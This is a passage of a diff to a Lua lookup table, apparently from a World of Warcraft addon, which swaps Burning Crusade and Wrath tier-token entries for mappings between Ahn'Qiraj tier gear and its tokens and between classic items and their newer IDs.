34851, -- Bracers of the Forgotten Protector + -- Conqueror's Breastplate + ["21331"] = { + 20929, -- Carapace of the Old God }, - -- Skyshatter Bracers - ["34438"] = { - 34851, -- Bracers of the Forgotten Protector + -- Conqueror's Legguards + ["21332"] = { + 20927, -- Ouro's Intact Hide }, - -- Skyshatter Wristguards - ["34439"] = { - 34851, -- Bracers of the Forgotten Protector + -- Conqueror's Greaves + ["21333"] = { + 20928, -- Qiraji Bindings of Command }, - -- Onslaught Bracers - ["34441"] = { - 34851, -- Bracers of the Forgotten Protector + -- Doomcaller's Robes + ["21334"] = { + 20933, -- Husk of the Old God }, - -- Onslaught Wristguards - ["34442"] = { - 34851, -- Bracers of the Forgotten Protector + -- Doomcaller's Mantle + ["21335"] = { + 20932, -- Qiraji Bindings of Dominance }, - -- Gronnstalker's Bracers - ["34443"] = { - 34851, -- Bracers of the Forgotten Protector + -- Doomcaller's Trousers + ["21336"] = { + 20931, -- Skin of the Great Sandworm }, - -- Thunderheart Wristguards - ["34444"] = { - 34852, -- Bracers of the Forgotten Vanquisher + -- Doomcaller's Circlet + ["21337"] = { + 20926, -- Vek'nilash's Circlet }, - -- Thunderheart Bracers - ["34445"] = { - 34852, -- Bracers of the Forgotten Vanquisher + -- Doomcaller's Footwraps + ["21338"] = { + 20932, -- Qiraji Bindings of Dominance }, - -- Thunderheart Bands - ["34446"] = { - 34852, -- Bracers of the Forgotten Vanquisher + -- Enigma Robes + ["21343"] = { + 20933, -- Husk of the Old God }, - -- Bracers of the Tempest - ["34447"] = { - 34852, -- Bracers of the Forgotten Vanquisher + -- Enigma Boots + ["21344"] = { + 20932, -- Qiraji Bindings of Dominance }, - -- Slayer's Bracers - ["34448"] = { - 34852, -- Bracers of the Forgotten Vanquisher + -- Enigma Shoulderpads + ["21345"] = { + 20932, -- Qiraji Bindings of Dominance }, - -- Lightbringer Girdle - ["34485"] = { - 34853, -- Belt of the Forgotten Conqueror + -- Enigma Leggings + ["21346"] = { + 20927, -- Ouro's Intact Hide }, - -- Lightbringer Belt - ["34487"] = { - 34853, -- Belt of the Forgotten Conqueror + -- Enigma Circlet + ["21347"] = { + 20926, -- Vek'nilash's Circlet }, - -- Lightbringer Waistguard - ["34488"] = { - 34853, -- Belt of the Forgotten Conqueror + -- Tiara of the Oracle + ["21348"] = { + 20926, -- Vek'nilash's Circlet }, - -- Belt of Absolution - ["34527"] = { - 34853, -- Belt of the Forgotten Conqueror + -- Footwraps of the Oracle + ["21349"] = { + 20928, -- Qiraji Bindings of Command }, - -- Cord of Absolution - ["34528"] = { - 34853, -- Belt of the Forgotten Conqueror + -- Mantle of the Oracle + ["21350"] = { + 20928, -- Qiraji Bindings of Command }, - -- Belt of the Malefic - ["34541"] = { - 34853, -- Belt of the Forgotten Conqueror + -- Vestments of the Oracle + ["21351"] = { + 20933, -- Husk of the Old God }, - -- Skyshatter Cord - ["34542"] = { - 34854, -- Belt of the Forgotten Protector + -- Trousers of the Oracle + ["21352"] = { + 20927, -- Ouro's Intact Hide }, - -- Skyshatter Belt - ["34543"] = { - 34854, -- Belt of the Forgotten Protector + -- Genesis Helm + ["21353"] = { + 20930, -- Vek'lor's Diadem }, - -- Skyshatter Girdle - ["34545"] = { - 34854, -- Belt of the Forgotten Protector + -- Genesis Shoulderpads + ["21354"] = { + 20932, -- Qiraji Bindings of Dominance }, - -- Onslaught Belt - ["34546"] = { - 34854, -- Belt of the Forgotten Protector + -- Genesis Boots + ["21355"] = { + 20932, -- Qiraji Bindings of Dominance }, - -- Onslaught Waistguard - ["34547"] = { - 34854, -- Belt of the Forgotten Protector + -- Genesis Trousers + ["21356"] = { + 20931, -- Skin of the Great Sandworm }, - -- Gronnstalker's Belt - ["34549"] = { - 34854, -- Belt of the Forgotten Protector + -- Genesis Vest + ["21357"] = { + 20933, -- Husk of the Old God }, - -- Thunderheart Belt - ["34554"] = { - 34855, -- Belt of the Forgotten Vanquisher + -- Deathdealer's Boots + ["21359"] = { + 20928, -- Qiraji Bindings of Command }, - -- Thunderheart Cord - ["34555"] = { - 34855, -- Belt of the Forgotten Vanquisher + -- Deathdealer's Helm + ["21360"] = { + 20930, -- Vek'lor's Diadem }, - -- Thunderheart Waistguard - ["34556"] = { - 34855, -- Belt of the Forgotten Vanquisher + -- Deathdealer's Spaulders + ["21361"] = { + 20928, -- Qiraji Bindings of Command }, - -- Belt of the Tempest - ["34557"] = { - 34855, -- Belt of the Forgotten Vanquisher + -- Deathdealer's Leggings + ["21362"] = { + 20927, -- Ouro's Intact Hide }, - -- Slayer's Belt - ["34558"] = { - 34855, -- Belt of the Forgotten Vanquisher + -- Deathdealer's Vest + ["21364"] = { + 20929, -- Carapace of the Old God }, - -- Lightbringer Treads - ["34559"] = { - 34856, -- Boots of the Forgotten Conqueror + -- Striker's Footguards + ["21365"] = { + 20928, -- Qiraji Bindings of Command }, - -- Lightbringer Stompers - ["34560"] = { - 34856, -- Boots of the Forgotten Conqueror + -- Striker's Diadem + ["21366"] = { + 20930, -- Vek'lor's Diadem }, - -- Lightbringer Boots - ["34561"] = { - 34856, -- Boots of the Forgotten Conqueror + -- Striker's Pauldrons + ["21367"] = { + 20928, -- Qiraji Bindings of Command }, - -- Boots of Absolution - ["34562"] = { - 34856, -- Boots of the Forgotten Conqueror + -- Striker's Leggings + ["21368"] = { + 20931, -- Skin of the Great Sandworm }, - -- Treads of Absolution - ["34563"] = { - 34856, -- Boots of the Forgotten Conqueror + -- Striker's Hauberk + ["21370"] = { + 20929, -- Carapace of the Old God }, - -- Boots of the Malefic - ["34564"] = { - 34856, -- Boots of the Forgotten Conqueror + -- Stormcaller's Diadem + ["21372"] = { + 20930, -- Vek'lor's Diadem }, - -- Skyshatter Boots - ["34565"] = { - 34857, -- Boots of the Forgotten Protector + -- Stormcaller's Footguards + ["21373"] = { + 20932, -- Qiraji Bindings of Dominance }, - -- Skyshatter Treads - ["34566"] = { - 34857, -- Boots of the Forgotten Protector + -- Stormcaller's Hauberk + ["21374"] = { + 20929, -- Carapace of the Old God }, - -- Skyshatter Greaves - ["34567"] = { - 34857, -- Boots of the Forgotten Protector + -- Stormcaller's Leggings + ["21375"] = { + 20931, -- Skin of the Great Sandworm }, - -- Onslaught Boots - ["34568"] = { - 34857, -- Boots of the Forgotten Protector + -- Stormcaller's Pauldrons + ["21376"] = { + 20932, -- Qiraji Bindings of Dominance }, - -- Onslaught Treads - ["34569"] = { - 34857, -- Boots of the Forgotten Protector + -- Avenger's Crown + ["21387"] = { + 20930, -- Vek'lor's Diadem }, - -- Gronnstalker's Boots - ["34570"] = { - 34857, -- Boots of the Forgotten Protector + -- Avenger's Greaves + ["21388"] = { + 20932, -- Qiraji Bindings of Dominance }, - -- Thunderheart Boots - ["34571"] = { - 34858, -- Boots of the Forgotten Vanquisher + -- Avenger's Breastplate + ["21389"] = { + 20929, -- Carapace of the Old God }, - -- Thunderheart Footwraps - ["34572"] = { - 34858, -- Boots of the Forgotten Vanquisher + -- Avenger's Legguards + ["21390"] = { + 20931, -- Skin of the Great Sandworm }, - -- Thunderheart Treads - ["34573"] = { - 34858, -- Boots of the Forgotten Vanquisher + -- Avenger's Pauldrons + ["21391"] = { + 20932, -- Qiraji Bindings of Dominance }, - -- Boots of the Tempest - ["34574"] = { - 34858, -- Boots of the Forgotten Vanquisher + -- Sickle of Unyielding Strength + ["21392"] = { + 20886, -- Qiraji Spiked Hilt }, - -- Slayer's Boots - ["34575"] = { - 34858, -- Boots of the Forgotten Vanquisher + -- Signet of Unyielding Strength + ["21393"] = { + 20884, -- Qiraji Magisterial Ring }, - -- Annihilator Holo-Gogs - ["34847"] = { - 35186, -- Schematic: Annihilator Holo-Gogs + -- Drape of Unyielding Strength + ["21394"] = { + 20885, -- Qiraji Martial Drape }, - -- Bracers of the Forgotten Conqueror - ["34848"] = { - 34431, -- Lightbringer Bands - 34432, -- Lightbringer Bracers - 34433, -- Lightbringer Wristguards - 34434, -- Bracers of Absolution - 34435, -- Cuffs of Absolution - 34436, -- Bracers of the Malefic + -- Blade of Eternal Justice + ["21395"] = { + 20886, -- Qiraji Spiked Hilt }, - -- Bracers of the Forgotten Protector - ["34851"] = { - 34437, -- Skyshatter Bands - 34438, -- Skyshatter Bracers - 34439, -- Skyshatter Wristguards - 34441, -- Onslaught Bracers - 34442, -- Onslaught Wristguards - 34443, -- Gronnstalker's Bracers + -- Ring of Eternal Justice + ["21396"] = { + 20884, -- Qiraji Magisterial Ring }, - -- Bracers of the Forgotten Vanquisher - ["34852"] = { - 34444, -- Thunderheart Wristguards - 34445, -- Thunderheart Bracers - 34446, -- Thunderheart Bands - 34447, -- Bracers of the Tempest - 34448, -- Slayer's Bracers + -- Cape of Eternal Justice + ["21397"] = { + 20889, -- Qiraji Regal Drape }, - -- Belt of the Forgotten Conqueror - ["34853"] = { - 34485, -- Lightbringer Girdle - 34487, -- Lightbringer Belt - 34488, -- Lightbringer Waistguard - 34527, -- Belt of Absolution - 34528, -- Cord of Absolution - 34541, -- Belt of the Malefic + -- Hammer of the Gathering Storm + ["21398"] = { + 20886, -- Qiraji Spiked Hilt }, - -- Belt of the Forgotten Protector - ["34854"] = { - 34542, -- Skyshatter Cord - 34543, -- Skyshatter Belt - 34545, -- Skyshatter Girdle - 34546, -- Onslaught Belt - 34547, -- Onslaught Waistguard - 34549, -- Gronnstalker's Belt + -- Ring of the Gathering Storm + ["21399"] = { + 20884, -- Qiraji Magisterial Ring }, - -- Belt of the Forgotten Vanquisher - ["34855"] = { - 34554, -- Thunderheart Belt - 34555, -- Thunderheart Cord - 34556, -- Thunderheart Waistguard - 34557, -- Belt of the Tempest - 34558, -- Slayer's Belt + -- Cloak of the Gathering Storm + ["21400"] = { + 20889, -- Qiraji Regal Drape }, - -- Boots of the Forgotten Conqueror - ["34856"] = { - 34559, -- Lightbringer Treads - 34560, -- Lightbringer Stompers - 34561, -- Lightbringer Boots - 34562, -- Boots of Absolution - 34563, -- Treads of Absolution - 34564, -- Boots of the Malefic + -- Scythe of the Unseen Path + ["21401"] = { + 20886, -- Qiraji Spiked Hilt }, - -- Boots of the Forgotten Protector - ["34857"] = { - 34565, -- Skyshatter Boots - 34566, -- Skyshatter Treads - 34567, -- Skyshatter Greaves - 34568, -- Onslaught Boots - 34569, -- Onslaught Treads - 34570, -- Gronnstalker's Boots + -- Signet of the Unseen Path + ["21402"] = { + 20888, -- Qiraji Ceremonial Ring }, - -- Boots of the Forgotten Vanquisher - ["34858"] = { - 34571, -- Thunderheart Boots - 34572, -- Thunderheart Footwraps - 34573, -- Thunderheart Treads - 34574, -- Boots of the Tempest - 34575, -- Slayer's Boots + -- Cloak of the Unseen Path + ["21403"] = { + 20889, -- Qiraji Regal Drape }, - -- Powerheal 9000 Lens - ["35181"] = { - 35189, -- Schematic: Powerheal 9000 Lens + -- Dagger of Veiled Shadows + ["21404"] = { + 20886, -- Qiraji Spiked Hilt }, - -- Hyper-Magnified Moon Specs - ["35182"] = { - 35190, -- Schematic: Hyper-Magnified Moon Specs + -- Band of Veiled Shadows + ["21405"] = { + 20888, -- Qiraji Ceremonial Ring }, - -- Primal-Attuned Goggles - ["35184"] = { - 35192, -- Schematic: Primal-Attuned Goggles + -- Cloak of Veiled Shadows + ["21406"] = { + 20885, -- Qiraji Martial Drape }, - -- Schematic: Annihilator Holo-Gogs - ["35186"] = { - 34847, -- Annihilator Holo-Gogs + -- Mace of Unending Life + ["21407"] = { + 20890, -- Qiraji Ornate Hilt }, - -- Schematic: Powerheal 9000 Lens - ["35189"] = { - 35181, -- Powerheal 9000 Lens + -- Band of Unending Life + ["21408"] = { + 20884, -- Qiraji Magisterial Ring }, - -- Schematic: Hyper-Magnified Moon Specs - ["35190"] = { - 35182, -- Hyper-Magnified Moon Specs + -- Cloak of Unending Life + ["21409"] = { + 20889, -- Qiraji Regal Drape }, - -- Schematic: Primal-Attuned Goggles - ["35192"] = { - 35184, -- Primal-Attuned Goggles + -- Gavel of Infinite Wisdom + ["21410"] = { + 20890, -- Qiraji Ornate Hilt }, - -- Schematic: Lightning Etched Specs - ["35193"] = { - 34355, -- Lightning Etched Specs + -- Ring of Infinite Wisdom + ["21411"] = { + 20888, -- Qiraji Ceremonial Ring }, - -- Schematic: Surestrike Goggles v3.0 - ["35194"] = { - 34356, -- Surestrike Goggles v3.0 + -- Shroud of Infinite Wisdom + ["21412"] = { + 20885, -- Qiraji Martial Drape }, - -- Schematic: Mayhem Projection Goggles - ["35195"] = { - 34354, -- Mayhem Projection Goggles + -- Blade of Vaulted Secrets + ["21413"] = { + 20890, -- Qiraji Ornate Hilt }, - -- Schematic: Hard Khorium Goggles - ["35196"] = { - 34357, -- Hard Khorium Goggles + -- Band of Vaulted Secrets + ["21414"] = { + 20884, -- Qiraji Magisterial Ring }, - -- Pattern: Sunfire Handwraps - ["35204"] = { - 34366, -- Sunfire Handwraps + -- Drape of Vaulted Secrets + ["21415"] = { + 20885, -- Qiraji Martial Drape }, - -- Pattern: Hands of Eternal Light - ["35205"] = { - 34367, -- Hands of Eternal Light + -- Kris of Unspoken Names + ["21416"] = { + 20890, -- Qiraji Ornate Hilt }, - -- Pattern: Sunfire Robe - ["35206"] = { - 34364, -- Sunfire Robe + -- Ring of Unspoken Names + ["21417"] = { + 20888, -- Qiraji Ceremonial Ring }, - -- Pattern: Robe of Eternal Light - ["35207"] = { - 34365, -- Robe of Eternal Light + -- Shroud of Unspoken Names + ["21418"] = { + 20889, -- Qiraji Regal Drape }, - -- Plans: Sunblessed Gauntlets - ["35208"] = { - 34380, -- Sunblessed Gauntlets + -- Charm of the Shifting Sands + ["21504"] = { + 21220, -- Head of Ossirian the Unscarred }, - -- Plans: Hard Khorium Battlefists - ["35209"] = { - 34378, -- Hard Khorium Battlefists + -- Choker of the Shifting Sands + ["21505"] = { + 21220, -- Head of Ossirian the Unscarred }, - -- Plans: Sunblessed Breastplate - ["35210"] = { - 34379, -- Sunblessed Breastplate + -- Pendant of the Shifting Sands + ["21506"] = { + 21220, -- Head of Ossirian the Unscarred }, - -- Plans: Hard Khorium Battleplate - ["35211"] = { - 34377, -- Hard Khorium Battleplate + -- Amulet of the Shifting Sands + ["21507"] = { + 21220, -- Head of Ossirian the Unscarred }, - -- Pattern: Leather Gauntlets of the Sun - ["35212"] = { - 34372, -- Leather Gauntlets of the Sun + -- Ring of the Fallen God + ["21709"] = { + 21221, -- Eye of C'Thun }, - -- Pattern: Fletcher's Gloves of the Phoenix - ["35213"] = { - 34374, -- Fletcher's Gloves of the Phoenix + -- Cloak of the Fallen God + ["21710"] = { + 21221, -- Eye of C'Thun }, - -- Pattern: Gloves of Immortal Dusk - ["35214"] = { - 34370, -- Gloves of Immortal Dusk + -- Amulet of the Fallen God + ["21712"] = { + 21221, -- Eye of C'Thun }, - -- Pattern: Sun-Drenched Scale Gloves - ["35215"] = { - 34376, -- Sun-Drenched Scale Gloves + -- Belt of Heroism + ["21994"] = { + 226864, -- Belt of Heroism }, - -- Pattern: Leather Chestguard of the Sun - ["35216"] = { - 34371, -- Leather Chestguard of the Sun + -- Boots of Heroism + ["21995"] = { + 226879, -- Boots of Heroism }, - -- Pattern: Embrace of the Phoenix - ["35217"] = { - 34373, -- Embrace of the Phoenix + -- Bracers of Heroism + ["21996"] = { + 226863, -- Bracers of Heroism }, - -- Pattern: Carapace of Sun and Shadow - ["35218"] = { - 34369, -- Carapace of Sun and Shadow + -- Breastplate of Heroism + ["21997"] = { + 226862, -- Breastplate of Heroism }, - -- Pattern: Sun-Drenched Scale Chestguard - ["35219"] = { - 34375, -- Sun-Drenched Scale Chestguard + -- Gauntlets of Heroism + ["21998"] = { + 226861, -- Gauntlets of Heroism }, - -- Heroes' Frostfire Circlet - ["39491"] = { - 40618, -- Helm of the Lost Vanquisher + -- Helm of Heroism + ["21999"] = { + 226877, -- Helm of Heroism }, - -- Heroes' Frostfire Robe - ["39492"] = { - 40612, -- Chestguard of the Lost Vanquisher + -- Legplates of Heroism + ["22000"] = { + 226859, -- Legplates of Heroism }, - -- Heroes' Frostfire Leggings - ["39493"] = { - 40621, -- Leggings of the Lost Vanquisher + -- Spaulders of Heroism + ["22001"] = { + 226858, -- Spaulders of Heroism }, - -- Heroes' Frostfire Shoulderpads - ["39494"] = { - 40624, -- Spaulders of the Lost Vanquisher + -- Darkmantle Belt + ["22002"] = { + 226832, -- Darkmantle Belt }, - -- Heroes' Frostfire Gloves - ["39495"] = { - 40615, -- Gloves of the Lost Vanquisher + -- Darkmantle Boots + ["22003"] = { + 226851, -- Darkmantle Boots }, - -- Heroes' Plagueheart Circlet - ["39496"] = { - 40616, -- Helm of the Lost Conqueror + -- Darkmantle Bracers + ["22004"] = { + 226830, -- Darkmantle Bracers }, - -- Heroes' Plagueheart Robe - ["39497"] = { - 40610, -- Chestguard of the Lost Conqueror + -- Darkmantle Cap + ["22005"] = { + 226829, -- Darkmantle Cap }, - -- Heroes' Plagueheart Leggings - ["39498"] = { - 40619, -- Leggings of the Lost Conqueror + -- Darkmantle Gloves + ["22006"] = { + 226850, -- Darkmantle Gloves }, - -- Heroes' Plagueheart Shoulderpads - ["39499"] = { - 40622, -- Spaulders of the Lost Conqueror + -- Darkmantle Pants + ["22007"] = { + 226827, -- Darkmantle Pants }, - -- Heroes' Plagueheart Gloves - ["39500"] = { - 40613, -- Gloves of the Lost Conqueror + -- Darkmantle Spaulders + ["22008"] = { + 226826, -- Darkmantle Spaulders }, - -- Heroes' Crown of Faith - ["39514"] = { - 40616, -- Helm of the Lost Conqueror + -- Darkmantle Tunic + ["22009"] = { + 226825, -- Darkmantle Tunic }, - -- Heroes' Robe of Faith - ["39515"] = { - 40610, -- Chestguard of the Lost Conqueror + -- Beastmaster's Belt + ["22010"] = { + 226888, -- Beastmaster's Belt }, - -- Heroes' Leggings of Faith - ["39517"] = { - 40619, -- Leggings of the Lost Conqueror + -- Beastmaster's Bindings + ["22011"] = { + 226885, -- Beastmaster's Bindings }, - -- Heroes' Shoulderpads of Faith - ["39518"] = { - 40622, -- Spaulders of the Lost Conqueror + -- Beastmaster's Cap + ["22013"] = { + 226887, -- Beastmaster's Cap }, - -- Heroes' Gloves of Faith - ["39519"] = { - 40613, -- Gloves of the Lost Conqueror + -- Beastmaster's Gloves + ["22015"] = { + 226902, -- Beastmaster's Gloves }, - -- Heroes' Circlet of Faith - ["39521"] = { - 40616, -- Helm of the Lost Conqueror + -- Beastmaster's Mantle + ["22016"] = { + 226884, -- Beastmaster's Mantle }, - -- Heroes' Raiments of Faith - ["39523"] = { - 40610, -- Chestguard of the Lost Conqueror + -- Beastmaster's Pants + ["22017"] = { + 226882, -- Beastmaster's Pants }, - -- Heroes' Pants of Faith - ["39528"] = { - 40619, -- Leggings of the Lost Conqueror + -- Beastmaster's Tunic + ["22060"] = { + 226886, -- Beastmaster's Tunic }, - -- Heroes' Mantle of Faith - ["39529"] = { - 40622, -- Spaulders of the Lost Conqueror + -- Beastmaster's Boots + ["22061"] = { + 226903, -- Beastmaster's Boots }, - -- Heroes' Handwraps of Faith - ["39530"] = { - 40613, -- Gloves of the Lost Conqueror + -- Sorcerer's Belt + ["22062"] = { + 226934, -- Sorcerer's Belt }, - -- Heroes' Dreamwalker Headpiece - ["39531"] = { - 40618, -- Helm of the Lost Vanquisher + -- Sorcerer's Bindings + ["22063"] = { + 226929, -- Sorcerer's Bindings }, - -- Heroes' Dreamwalker Robe - ["39538"] = { - 40612, -- Chestguard of the Lost Vanquisher + -- Sorcerer's Boots + ["22064"] = { + 226943, -- Sorcerer's Boots }, - -- Heroes' Dreamwalker Leggings - ["39539"] = { - 40621, -- Leggings of the Lost Vanquisher + -- Sorcerer's Crown + ["22065"] = { + 226935, -- Sorcerer's Crown }, - -- Heroes' Dreamwalker Spaulders - ["39542"] = { - 40624, -- Spaulders of the Lost Vanquisher + -- Sorcerer's Gloves + ["22066"] = { + 226942, -- Sorcerer's Gloves }, - -- Heroes' Dreamwalker Handguards - ["39543"] = { - 40615, -- Gloves of the Lost Vanquisher + -- Sorcerer's Leggings + ["22067"] = { + 226933, -- Sorcerer's Leggings }, - -- Heroes' Dreamwalker Gloves - ["39544"] = { - 40615, -- Gloves of the Lost Vanquisher + -- Sorcerer's Mantle + ["22068"] = { + 226936, -- Sorcerer's Mantle }, - -- Heroes' Dreamwalker Cover - ["39545"] = { - 40618, -- Helm of the Lost Vanquisher + -- Sorcerer's Robes + ["22069"] = { + 226932, -- Sorcerer's Robes }, - -- Heroes' Dreamwalker Trousers - ["39546"] = { - 40621, -- Leggings of the Lost Vanquisher + -- Deathmist Belt + ["22070"] = { + 226905, -- Deathmist Belt }, - -- Heroes' Dreamwalker Vestments - ["39547"] = { - 40612, -- Chestguard of the Lost Vanquisher + -- Deathmist Bracers + ["22071"] = { + 226907, -- Deathmist Bracers }, - -- Heroes' Dreamwalker Mantle - ["39548"] = { - 40624, -- Spaulders of the Lost Vanquisher + -- Deathmist Leggings + ["22072"] = { + 226910, -- Deathmist Leggings }, - -- Heroes' Dreamwalker Headguard - ["39553"] = { - 40618, -- Helm of the Lost Vanquisher + -- Deathmist Mantle + ["22073"] = { + 226912, -- Deathmist Mantle }, - -- Heroes' Dreamwalker Raiments - ["39554"] = { - 40612, -- Chestguard of the Lost Vanquisher + -- Deathmist Mask + ["22074"] = { + 226909, -- Deathmist Mask }, - -- Heroes' Dreamwalker Legguards - ["39555"] = { - 40621, -- Leggings of the Lost Vanquisher + -- Deathmist Robe + ["22075"] = { + 226906, -- Deathmist Robe }, - -- Heroes' Dreamwalker Shoulderpads - ["39556"] = { - 40624, -- Spaulders of the Lost Vanquisher + -- Deathmist Sandals + ["22076"] = { + 226908, -- Deathmist Sandals }, - -- Heroes' Dreamwalker Handgrips - ["39557"] = { - 40615, -- Gloves of the Lost Vanquisher + -- Deathmist Wraps + ["22077"] = { + 226911, -- Deathmist Wraps }, - -- Heroes' Bonescythe Breastplate - ["39558"] = { - 40612, -- Chestguard of the Lost Vanquisher + -- Virtuous Belt + ["22078"] = { + 226948, -- Virtuous Belt }, - -- Heroes' Bonescythe Gauntlets - ["39560"] = { - 40615, -- Gloves of the Lost Vanquisher + -- Virtuous Bracers + ["22079"] = { + 226949, -- Virtuous Bracers }, - -- Heroes' Bonescythe Helmet - ["39561"] = { - 40618, -- Helm of the Lost Vanquisher + -- Virtuous Crown + ["22080"] = { + 226947, -- Virtuous Crown }, - -- Heroes' Bonescythe Legplates - ["39564"] = { - 40621, -- Leggings of the Lost Vanquisher + -- Virtuous Gloves + ["22081"] = { + 226966, -- Virtuous Gloves }, - -- Heroes' Bonescythe Pauldrons - ["39565"] = { - 40624, -- Spaulders of the Lost Vanquisher + -- Virtuous Mantle + ["22082"] = { + 226951, -- Virtuous Mantle }, - -- Heroes' Cryptstalker Headpiece - ["39578"] = { - 40617, -- Helm of the Lost Protector + -- Virtuous Robe + ["22083"] = { + 226945, -- Virtuous Robe }, - -- Heroes' Cryptstalker Tunic - ["39579"] = { - 40611, -- Chestguard of the Lost Protector + -- Virtuous Sandals + ["22084"] = { + 226952, -- Virtuous Sandals }, - -- Heroes' Cryptstalker Legguards - ["39580"] = { - 40620, -- Leggings of the Lost Protector + -- Virtuous Skirt + ["22085"] = { + 226946, -- Virtuous Skirt }, - -- Heroes' Cryptstalker Spaulders - ["39581"] = { - 40623, -- Spaulders of the Lost Protector + -- Soulforge Belt + ["22086"] = { + 226971, -- Soulforge Belt }, - -- Heroes' Cryptstalker Handguards - ["39582"] = { - 40614, -- Gloves of the Lost Protector + -- Soulforge Boots + ["22087"] = { + 226999, -- Soulforge Boots }, - -- Heroes' Earthshatter Headpiece - ["39583"] = { - 40617, -- Helm of the Lost Protector + -- Soulforge Bracers + ["22088"] = { + 226970, -- Soulforge Bracers }, - -- Heroes' Earthshatter Tunic - ["39588"] = { - 40611, -- Chestguard of the Lost Protector + -- Soulforge Breastplate + ["22089"] = { + 226973, -- Soulforge Breastplate }, - -- Heroes' Earthshatter Legguards - ["39589"] = { - 40620, -- Leggings of the Lost Protector + -- Soulforge Gauntlets + ["22090"] = { + 226975, -- Soulforge Gauntlets }, - -- Heroes' Earthshatter Spaulders - ["39590"] = { - 40623, -- Spaulders of the Lost Protector + -- Soulforge Helm + ["22091"] = { + 226997, -- Soulforge Helm }, - -- Heroes' Earthshatter Handguards - ["39591"] = { - 40614, -- Gloves of the Lost Protector + -- Soulforge Legplates + ["22092"] = { + 226972, -- Soulforge Legplates }, - -- Heroes' Earthshatter Hauberk - ["39592"] = { - 40611, -- Chestguard of the Lost Protector + -- Soulforge Spaulders + ["22093"] = { + 226969, -- Soulforge Spaulders }, - -- Heroes' Earthshatter Gloves - ["39593"] = { - 40614, -- Gloves of the Lost Protector + -- Bindings of The Five Thunders + ["22095"] = { + 227001, -- Bindings of The Five Thunders }, - -- Heroes' Earthshatter Helm - ["39594"] = { - 40617, -- Helm of the Lost Protector + -- Boots of The Five Thunders + ["22096"] = { + 227039, -- Boots of The Five Thunders }, - -- Heroes' Earthshatter Kilt - ["39595"] = { - 40620, -- Leggings of the Lost Protector + -- Coif of The Five Thunders + ["22097"] = { + 227002, -- Coif of The Five Thunders }, - -- Heroes' Earthshatter Shoulderpads - ["39596"] = { - 40623, -- Spaulders of the Lost Protector + -- Cord of The Five Thunders + ["22098"] = { + 227008, -- Cord of The Five Thunders }, - -- Heroes' Earthshatter Chestguard - ["39597"] = { - 40611, -- Chestguard of the Lost Protector + -- Gauntlets of The Five Thunders + ["22099"] = { + 227006, -- Gauntlets of The Five Thunders }, - -- Heroes' Earthshatter Grips - ["39601"] = { - 40614, -- Gloves of the Lost Protector + -- Kilt of The Five Thunders + ["22100"] = { + 227005, -- Kilt of The Five Thunders }, - -- Heroes' Earthshatter Faceguard - ["39602"] = { - 40617, -- Helm of the Lost Protector + -- Pauldrons of The Five Thunders + ["22101"] = { + 227003, -- Pauldrons of The Five Thunders }, - -- Heroes' Earthshatter War-Kilt - ["39603"] = { - 40620, -- Leggings of the Lost Protector + -- Vest of The Five Thunders + ["22102"] = { + 227004, -- Vest of The Five Thunders }, - -- Heroes' Earthshatter Shoulderguards - ["39604"] = { - 40623, -- Spaulders of the Lost Protector + -- Feralheart Boots + ["22107"] = { + 226821, -- Feralheart Boots }, - -- Heroes' Dreadnaught Helmet - ["39605"] = { - 40617, -- Helm of the Lost Protector + -- Feralheart Cowl + ["22109"] = { + 226773, -- Feralheart Cowl }, - -- Heroes' Dreadnaught Battleplate - ["39606"] = { - 40611, -- Chestguard of the Lost Protector + -- Feralheart Gloves + ["22110"] = { + 226820, -- Feralheart Gloves }, - -- Heroes' Dreadnaught Legplates - ["39607"] = { - 40620, -- Leggings of the Lost Protector + -- Feralheart Kilt + ["22111"] = { + 226779, -- Feralheart Kilt }, - -- Heroes' Dreadnaught Shoulderplates - ["39608"] = { - 40623, -- Spaulders of the Lost Protector + -- Feralheart Spaulders + ["22112"] = { + 226778, -- Feralheart Spaulders }, - -- Heroes' Dreadnaught Gauntlets - ["39609"] = { - 40614, -- Gloves of the Lost Protector + -- Feralheart Vest + ["22113"] = { + 226776, -- Feralheart Vest }, - -- Heroes' Dreadnaught Greathelm - ["39610"] = { - 40617, -- Helm of the Lost Protector + -- Wristguards of Renown + ["22204"] = { + 227986, -- Wristguards of Renown }, - -- Heroes' Dreadnaught Breastplate - ["39611"] = { - 40611, -- Chestguard of the Lost Protector + -- Sash of the Grand Hunt + ["22207"] = { + 227987, -- Sash of the Grand Hunt }, - -- Heroes' Dreadnaught Legguards - ["39612"] = { - 40620, -- Leggings of the Lost Protector + -- Lavastone Hammer + ["22208"] = { + 227974, -- Lavastone Hammer }, - -- Heroes' Dreadnaught Pauldrons - ["39613"] = { - 40623, -- Spaulders of the Lost Protector + -- Golem Fitted Pauldrons + ["22212"] = { + 227947, -- Golem Fitted Pauldrons }, - -- Heroes' Scourgeborne Battleplate - ["39617"] = { - 40612, -- Chestguard of the Lost Vanquisher + -- Kayser's Boots of Precision + ["22231"] = { + 228594, -- Kayser's Boots of Precision }, - -- Heroes' Scourgeborne Gauntlets - ["39618"] = { - 40615, -- Gloves of the Lost Vanquisher + -- Marksman's Girdle + ["22232"] = { + 228595, -- Marksman's Girdle }, - -- Heroes' Scourgeborne Helmet - ["39619"] = { - 40618, -- Helm of the Lost Vanquisher + -- Verek's Leash + ["22242"] = { + 227944, -- Verek's Leash }, - -- Heroes' Scourgeborne Legplates - ["39620"] = { - 40621, -- Leggings of the Lost Vanquisher + -- Soot Encrusted Footwear + ["22245"] = { + 227945, -- Soot Encrusted Footwear }, - -- Heroes' Scourgeborne Shoulderplates - ["39621"] = { - 40624, -- Spaulders of the Lost Vanquisher + -- Flarethorn + ["22266"] = { + 227962, -- Flarethorn }, - -- Heroes' Dreadnaught Handguards - ["39622"] = { - 40614, -- Gloves of the Lost Protector + -- Spellweaver's Turban + ["22267"] = { + 228677, -- Spellweaver's Turban }, - -- Heroes' Scourgeborne Chestguard - ["39623"] = { - 40612, -- Chestguard of the Lost Vanquisher + -- Draconic Infused Emblem + ["22268"] = { + 228678, -- Draconic Infused Emblem }, - -- Heroes' Scourgeborne Handguards - ["39624"] = { - 40615, -- Gloves of the Lost Vanquisher + -- Ironweave Robe + ["22301"] = { + 228547, -- Ironweave Robe }, - -- Heroes' Scourgeborne Faceguard - ["39625"] = { - 40618, -- Helm of the Lost Vanquisher + -- Ironweave Cowl + ["22302"] = { + 228681, -- Ironweave Cowl }, - -- Heroes' Scourgeborne Legguards - ["39626"] = { - 40621, -- Leggings of the Lost Vanquisher + -- Ironweave Pants + ["22303"] = { + 228038, -- Ironweave Pants }, - -- Heroes' Scourgeborne Pauldrons - ["39627"] = { - 40624, -- Spaulders of the Lost 